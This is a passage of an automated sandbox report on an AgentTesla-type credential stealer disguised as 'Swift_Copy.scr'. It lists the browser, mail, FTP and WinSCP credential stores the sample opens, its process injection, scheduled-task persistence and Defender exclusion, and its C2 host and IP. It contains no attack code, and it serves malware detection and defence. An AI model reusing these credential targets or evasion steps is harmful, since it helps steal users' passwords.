                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeQueries volume information: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

Source: Yara match | File source: 8.2.WAuLmtFUmD.exe.50a5450.11.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.WAuLmtFUmD.exe.506aa30.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Swift_Copy.scr.44510c0.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Swift_Copy.scr.44166a0.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.WAuLmtFUmD.exe.50a5450.11.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Swift_Copy.scr.44166a0.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Swift_Copy.scr.44510c0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.WAuLmtFUmD.exe.506aa30.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.3276330521.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2113537992.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2118653417.00000000028FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.3276330521.0000000002E37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2108100860.0000000004416000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2118653417.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2140171444.000000000506A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Swift_Copy.scr PID: 4592, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5948, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: WAuLmtFUmD.exe PID: 5960, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 1276, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match | File source: 8.2.WAuLmtFUmD.exe.50a5450.11.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.WAuLmtFUmD.exe.506aa30.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Swift_Copy.scr.44510c0.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Swift_Copy.scr.44166a0.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.WAuLmtFUmD.exe.50a5450.11.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Swift_Copy.scr.44166a0.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Swift_Copy.scr.44510c0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.WAuLmtFUmD.exe.506aa30.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.2113537992.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2108100860.0000000004416000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2118653417.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2140171444.000000000506A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Swift_Copy.scr PID: 4592, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5948, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: WAuLmtFUmD.exe PID: 5960, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 1276, type: MEMORYSTR

                    Remote Access Functionality

Source: Yara match | File source: 8.2.WAuLmtFUmD.exe.50a5450.11.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.WAuLmtFUmD.exe.506aa30.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Swift_Copy.scr.44510c0.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Swift_Copy.scr.44166a0.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.WAuLmtFUmD.exe.50a5450.11.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Swift_Copy.scr.44166a0.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Swift_Copy.scr.44510c0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.WAuLmtFUmD.exe.506aa30.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.3276330521.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2113537992.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2118653417.00000000028FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.3276330521.0000000002E37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2108100860.0000000004416000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2118653417.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2140171444.000000000506A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Swift_Copy.scr PID: 4592, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5948, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: WAuLmtFUmD.exe PID: 5960, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 1276, type: MEMORYSTR
Mitre Att&ck Matrix (flattened; one line per tactic column, techniques in the order of the original rows, numeric badges kept as shown):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 121 Windows Management Instrumentation; 1 Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 DLL Side-Loading; 1 Scheduled Task/Job; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 1 DLL Side-Loading; 311 Process Injection; 1 Scheduled Task/Job; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 141 Virtualization/Sandbox Evasion; 311 Process Injection
Credential Access: 2 OS Credential Dumping; 1 Input Capture; 1 Credentials in Registry; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 1 File and Directory Discovery; 24 System Information Discovery; 211 Security Software Discovery; 1 Process Discovery; 141 Virtualization/Sandbox Evasion; 1 Application Window Discovery; Remote System Discovery; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 11 Archive Collected Data; 2 Data from Local System; 1 Email Collection; 1 Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 1 Encrypted Channel; 1 Non-Standard Port; 1 Non-Application Layer Protocol; 11 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
Behavior Graph (ID: 1430207, Sample: Swift_Copy.scr, Start date: 23/04/2024, Architecture: WINDOWS, Score: 100)

Network nodes: mail.sigmamotorspk.com; sigmamotorspk.com (65.21.71.87, ports 49709, 49711, 587; CP-ASDE, United States)

Sample-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Sigma detected: Scheduled temp file as task from temp location; 8 other signatures

Process tree:
• Swift_Copy.scr (started)
  • Dropped files: C:\Users\user\AppData\...\WAuLmtFUmD.exe (PE32); C:\Users\user\AppData\Local\...\tmp7FF5.tmp (XML)
  • Signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Writes to foreign memory regions; Allocates memory in foreign processes; Adds a directory exclusion to Windows Defender
  • RegSvcs.exe (started): connects to sigmamotorspk.com 65.21.71.87; Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
  • powershell.exe (started): Loading BitLocker PowerShell Module
    • WmiPrvSE.exe (started)
    • conhost.exe (started)
  • schtasks.exe (started)
    • conhost.exe (started)
• WAuLmtFUmD.exe (started)
  • Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Injects a PE file into a foreign processes
  • RegSvcs.exe (started): Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)
  • schtasks.exe (started)
    • conhost.exe (started)

Source | Detection | Scanner | Label
Swift_Copy.scr | 45% | Virustotal |
Swift_Copy.scr | 71% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
Swift_Copy.scr | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | 71% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe | 45% | Virustotal |

No Antivirus matches

Source | Detection | Scanner | Label
sigmamotorspk.com | 0% | Virustotal |
mail.sigmamotorspk.com | 0% | Virustotal |

Source | Detection | Scanner | Label
https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | 0% | URL Reputation | safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | 0% | URL Reputation | safe
http://sigmamotorspk.com | 0% | Avira URL Cloud | safe
http://mail.sigmamotorspk.com | 0% | Avira URL Cloud | safe
http://mail.sigmamotorspk.com | 0% | Virustotal |
http://sigmamotorspk.com | 0% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
sigmamotorspk.com | 65.21.71.87 | true | false | | unknown
mail.sigmamotorspk.com | unknown | unknown | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://mail.sigmamotorspk.com | RegSvcs.exe, 00000007.00000002.2118653417.0000000002906000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3276330521.0000000002E56000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://account.dyn.com/ | Swift_Copy.scr, 00000000.00000002.2108100860.0000000004416000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2113537992.0000000000402000.00000040.00000400.00020000.00000000.sdmp, WAuLmtFUmD.exe, 00000008.00000002.2140171444.000000000506A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Swift_Copy.scr, 00000000.00000002.2106668901.00000000033F6000.00000004.00000800.00020000.00000000.sdmp, WAuLmtFUmD.exe, 00000008.00000002.2135864386.00000000035B4000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | Swift_Copy.scr, WAuLmtFUmD.exe.0.dr | false | URL Reputation: safe; URL Reputation: safe | unknown
http://sigmamotorspk.com | RegSvcs.exe, 00000007.00000002.2118653417.0000000002906000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3276330521.0000000002E56000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
65.21.71.87 | sigmamotorspk.com | United States | 199592 | CP-ASDE | false
                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1430207
                        Start date and time:2024-04-23 10:18:50 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 8m 12s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:15
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:Swift_Copy.scr
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winSCR@16/11@1/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 172
                        • Number of non-executed functions: 11
                        Cookbook Comments:
                        • Found application associated with file extension: .scr
                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtCreateKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
10:19:41 | API Interceptor | 2x Sleep call for process: Swift_Copy.scr modified
10:19:44 | Task Scheduler | Run new task: WAuLmtFUmD path: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe
10:19:44 | API Interceptor | 16x Sleep call for process: powershell.exe modified
10:19:46 | API Interceptor | 62x Sleep call for process: RegSvcs.exe modified
10:19:46 | API Interceptor | 2x Sleep call for process: WAuLmtFUmD.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
65.21.71.87 | KhT.scr.exe | malicious | AgentTesla, PureLog Stealer |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CP-ASDE | http://myidealwedding.com.au | malicious | BitRAT, HTMLPhisher | 65.21.119.50
CP-ASDE | arm7.elf | malicious | Mirai, Moobot | 65.20.154.20
CP-ASDE | CrHadzetWq.exe | malicious | Unknown | 65.20.106.109
CP-ASDE | CrHadzetWq.exe | malicious | Unknown | 65.20.106.109
CP-ASDE | KhT.scr.exe | malicious | AgentTesla, PureLog Stealer | 65.21.71.87
CP-ASDE | S17OHHT4VG.exe | malicious | RedLine | 65.21.119.55
CP-ASDE | AH13mMVUYY.exe | malicious | PureLog Stealer, zgRAT | 65.21.20.120
CP-ASDE | 2luFBixrAW.elf | malicious | Mirai | 65.20.206.151
CP-ASDE | GE1fUFlJuQ.exe | malicious | RisePro Stealer | 65.21.21.176
CP-ASDE | 906o5yr1NE.exe | malicious | LummaC, Glupteba, LummaC Stealer, SmokeLoader, Stealc, Xmrig | 65.21.94.13
                          No context
                          No context
                          Process:C:\Users\user\Desktop\Swift_Copy.scr
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1216
                          Entropy (8bit):5.34331486778365
                          Encrypted:false
                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                          Malicious:false
                          Reputation:high, very likely benign file
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, 